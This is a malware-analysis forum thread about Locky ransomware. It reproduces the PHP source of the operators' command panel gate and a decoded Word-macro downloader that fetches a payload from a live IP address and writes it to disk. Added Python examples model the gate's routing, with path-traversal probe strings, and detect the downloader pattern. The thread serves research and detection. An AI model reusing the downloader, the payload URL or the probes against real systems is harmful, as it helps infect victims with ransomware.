Locky ransomware

Forum for analysis and discussion about malware.
Blaze
Posts: 198
Joined: Fri Aug 27, 2010 7:35 am

Locky ransomware

Post by Blaze » Wed Feb 17, 2016 4:48 pm

You do not have the required permissions to view the files attached to this post.

maddog4012
Posts: 74
Joined: Mon Aug 04, 2014 6:53 pm

Re: Locky ransomware

Post by maddog4012 » Wed Feb 17, 2016 7:42 pm

This malware is dropped from a Word doc that arrives by e-mail.
You do not have the required permissions to view the files attached to this post.

benkow_
Posts: 85
Joined: Sat Jan 24, 2015 12:14 pm

Re: Locky ransomware

Post by benkow_ » Thu Feb 18, 2016 8:49 am

Not really useful, but for some minutes the panel server had some problem and we were able to download PHP files.
gate (main.php):

Code:

<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

// Only a POST with a non-empty body is accepted; anything else gets a 404,
// so the gate looks dead to casual probing with a browser.
if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
// The bot sends an encrypted body; decrypt_bot_request() (defined in the
// included files) turns it back into a query string parsed straight into $_POST.
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

// 'act' selects the handler; basename() strips any directory part, so the
// include can only reach files inside actions/.
$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>
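
To make the dispatch rules of main.php testable offline, here is a Python model of its control flow. This is an added example, not code from the panel or from benkow_'s post: decrypt_bot_request() is not on the page, so the model takes the already decrypted body as its input, and the handler names under actions/ are placeholders (both marked as assumptions in the code). The PHP behaviours that matter for routing, empty(), basename() and trim(), are modelled explicitly.

```python
"""Offline model of the request routing in the gate's main.php."""
import posixpath
from urllib.parse import parse_qsl

ACTIONS_DIR = "actions"
# Assumption: placeholder handler names. The real contents of actions/
# on the panel are not on the page.
AVAILABLE_ACTIONS = {"actions/getkey.php", "actions/report.php"}


def php_empty(value):
    """PHP empty(): true for a missing key, "" and the string "0"."""
    return value is None or value == "" or value == "0"


def php_basename(path):
    """PHP basename(): last path component, trailing slashes ignored."""
    return posixpath.basename(path.rstrip("/"))


def parse_str(body):
    """Approximation of PHP parse_str(): percent-decoding, last key wins."""
    return dict(parse_qsl(body, keep_blank_values=True))


def route(method, decrypted_body, available=AVAILABLE_ACTIONS):
    """Mirror main.php's checks and return ("error", 404) or ("dispatch", script).

    Assumption: decrypted_body is what decrypt_bot_request() would have
    produced from the POST body; the cipher itself is not on the page.
    """
    if method != "POST":                       # non-POST -> 404
        return ("error", 404)
    if not decrypted_body:                     # empty body -> 404
        return ("error", 404)
    post = parse_str(decrypted_body)           # parse_str(..., $_POST)
    if php_empty(post.get("id")) or php_empty(post.get("act")):
        return ("error", 404)
    # trim(basename($_POST['act'])) confines the include to ACTIONS_DIR
    handler = php_basename(post["act"]).strip()
    script = f"{ACTIONS_DIR}/{handler}.php"
    if script not in available:                # @file_exists() check
        return ("error", 404)
    return ("dispatch", script)


def probe_summary(available=AVAILABLE_ACTIONS):
    """Constructed requests an analyst might try, with the gate's answer."""
    cases = {
        "browser GET": ("GET", "id=abc&act=getkey"),
        "POST, empty body": ("POST", ""),
        "valid bot request": ("POST", "id=abc&act=getkey"),
        "traversal in act": ("POST", "id=abc&act=../../../etc/passwd"),
        "traversal to a real handler": ("POST", "id=abc&act=../../getkey"),
        "id=0 (PHP empty() quirk)": ("POST", "id=0&act=getkey"),
        "trailing space in act": ("POST", "id=abc&act=getkey%20"),
    }
    return {name: route(m, b, available) for name, (m, b) in cases.items()}


if __name__ == "__main__":
    for name, outcome in probe_summary().items():
        print(f"{name:32s} -> {outcome}")
```

Two consequences worth keeping in mind when poking at such a gate: everything that is not a POST whose body decrypts to a non-empty id and act is answered with 404, so a GET from a browser says nothing about whether the server is still up; and act goes through basename(), so ../ sequences collapse to the last path component instead of being rejected, which means traversal cannot leave actions/ but a handler name is still reachable through a traversal-looking value. The id=0 case is PHP's empty() treating the string "0" as empty, not a choice of the panel author.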

eli
Posts: 1
Joined: Wed Feb 10, 2016 12:48 pm

Re: Locky ransomware

Post by eli » Thu Feb 18, 2016 12:43 pm

Seems like it stopped working. Servers taken down?

frank_boldewin
Posts: 116
Joined: Thu Apr 22, 2010 8:59 am
Location: Germany

Re: Locky ransomware

Post by frank_boldewin » Tue Feb 23, 2016 4:23 pm

eli wrote: Seems like it stopped working. Servers taken down?
maddog4012's doc file starts a macro with some obfuscated VB code that decodes to the following code:

Code:

// Decoded downloader: fetches a URL with MSXML2.XMLHTTP and writes the raw
// response body to disk through an ADODB.Stream (type 1 = binary).
function downloadToFile(url,file)
{
	var xhr=new ActiveXObject("msxml2.xmlhttp");
	ado=new ActiveXObject("ADODB.Stream");   // implicit global, as in the original
	xhr.open("GET",url,false);               // synchronous GET
	xhr.send();
	if(xhr.status===200)
	{
		ado.type=1;                          // adTypeBinary
		ado.open();
		ado.write(xhr.responseBody);
		ado.saveToFile(file);                // write the payload to 'file'
		ado.close();
		return xhr.responseBody;
	}
}

// 'fundamentally' is a variable assigned elsewhere in the decoded macro
// (not shown in the post); it is passed as the file to save to.
downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);

The executable can still be downloaded.
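
A small triage helper for the idiom in the decoded macro above, added here as an example and not part of frank_boldewin's post: it looks for the MSXML2.XMLHTTP + ADODB.Stream + saveToFile combination in deobfuscated script text and pulls the URL and destination argument out of the call to the wrapper function. The indicator regexes and the second, benign sample are my own construction; the first sample is the decoded code from the post.

```python
"""Triage helper for the XMLHTTP + ADODB.Stream download-and-save idiom."""
import re

# Constructed sample 1: the decoded downloader from the post above.
DECODED_MACRO = r"""
function downloadToFile(url,file)
{
    var xhr=new ActiveXObject("msxml2.xmlhttp");
    ado=new ActiveXObject("ADODB.Stream");
    xhr.open("GET",url,false);
    xhr.send();
    if(xhr.status===200)
    {
        ado.type=1;
        ado.open();
        ado.write(xhr.responseBody);
        ado.saveToFile(file);
        ado.close();
        return xhr.responseBody;
    }
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);
"""

# Constructed sample 2: an XMLHTTP request that reads text but never
# writes a file; it must not be flagged.
BENIGN_SAMPLE = r"""
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET", "http://intranet.example/status", false);
xhr.send();
WScript.Echo(xhr.responseText);
"""

# All three must be present for a hit. Names and patterns are this
# example's own choices (assumption), not signatures from any product.
INDICATORS = {
    "xmlhttp": re.compile(
        r'ActiveXObject\s*\(\s*["\']msxml2\.(?:server)?xmlhttp[^"\']*["\']', re.I),
    "adodb_stream": re.compile(r'ActiveXObject\s*\(\s*["\']adodb\.stream["\']', re.I),
    "save_to_file": re.compile(r'\.saveToFile\s*\(', re.I),
}
# "function name(a, b)": the two-argument wrapper taking url and file.
FUNC_DEF = re.compile(r'function\s+(\w+)\s*\(\s*\w+\s*,\s*\w+\s*\)')
URL_LITERAL = re.compile(r'["\'](https?://[^"\']+)["\']', re.I)


def analyse(script_text):
    """Classify one deobfuscated script and extract download details.

    Returns a dict with: is_downloader (all indicators present), the
    per-indicator hits, the wrapper function name, the URL literals
    passed to it, and the destination argument exactly as written.
    """
    hits = {name: bool(rx.search(script_text)) for name, rx in INDICATORS.items()}
    result = {
        "is_downloader": all(hits.values()),
        "indicators": hits,
        "function": None,
        "urls": [],
        "destination": None,
    }
    if not result["is_downloader"]:
        return result

    m = FUNC_DEF.search(script_text)
    if m:
        fname = m.group(1)
        result["function"] = fname
        # Call sites of the wrapper: fname('http://...', <destination>)
        call = re.compile(
            r'\b' + re.escape(fname)
            + r'\s*\(\s*["\'](https?://[^"\']+)["\']\s*,\s*([^)\s]+)\s*\)', re.I)
        for c in call.finditer(script_text):
            result["urls"].append(c.group(1))
            result["destination"] = c.group(2)
    # Fallback when the wrapper is inlined: any URL literal in the script.
    if not result["urls"]:
        result["urls"] = URL_LITERAL.findall(script_text)
    return result


def extract_hosts(script_text):
    """Network indicators to block or hunt for: unique hosts from the URLs."""
    hosts = []
    for url in analyse(script_text)["urls"]:
        host = url.split("://", 1)[1].split("/", 1)[0]
        if host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    for label, text in (("decoded macro", DECODED_MACRO), ("benign", BENIGN_SAMPLE)):
        print(label, analyse(text), extract_hosts(text))
```

The destination comes back as the identifier the macro passed (here `fundamentally`) rather than a path, because the decoded layer shown sets that variable elsewhere; the URL literal, not the file name, is the indicator this layer reliably gives up.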

frank_boldewin
Posts: 116
Joined: Thu Apr 22, 2010 8:59 am
Location: Germany

Re: Locky ransomware

Post by frank_boldewin » Wed Feb 24, 2016 2:14 pm

Just in case one is interested, attached is an unpacked version of Locky.
You do not have the required permissions to view the files attached to this post.

w0rm
Posts: 1
Joined: Mon Apr 21, 2014 4:09 pm

Re: Locky ransomware

Post by w0rm » Wed Feb 24, 2016 5:38 pm

There seems to be a version with a new DGA, but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)

Xylitol
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Locky ransomware

Post by Xylitol » Wed Feb 24, 2016 6:27 pm

In attachment.
You do not have the required permissions to view the files attached to this post.

FafZee
Posts: 24
Joined: Tue Mar 19, 2013 11:08 am

Re: Locky ransomware

Post by FafZee » Thu Feb 25, 2016 8:37 am

Unpacked in attachment
You do not have the required permissions to view the files attached to this post.

p1nk
Posts: 44
Joined: Thu Oct 29, 2015 1:09 am

Re: Locky ransomware

Post by p1nk » Fri Feb 26, 2016 7:12 am

benkow_ wrote: Not really useful, but for some minutes the panel server had some problem and we were able to download PHP files.
gate (main.php):

Code:

<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>

Do you have an archive of all the collected PHP pages?
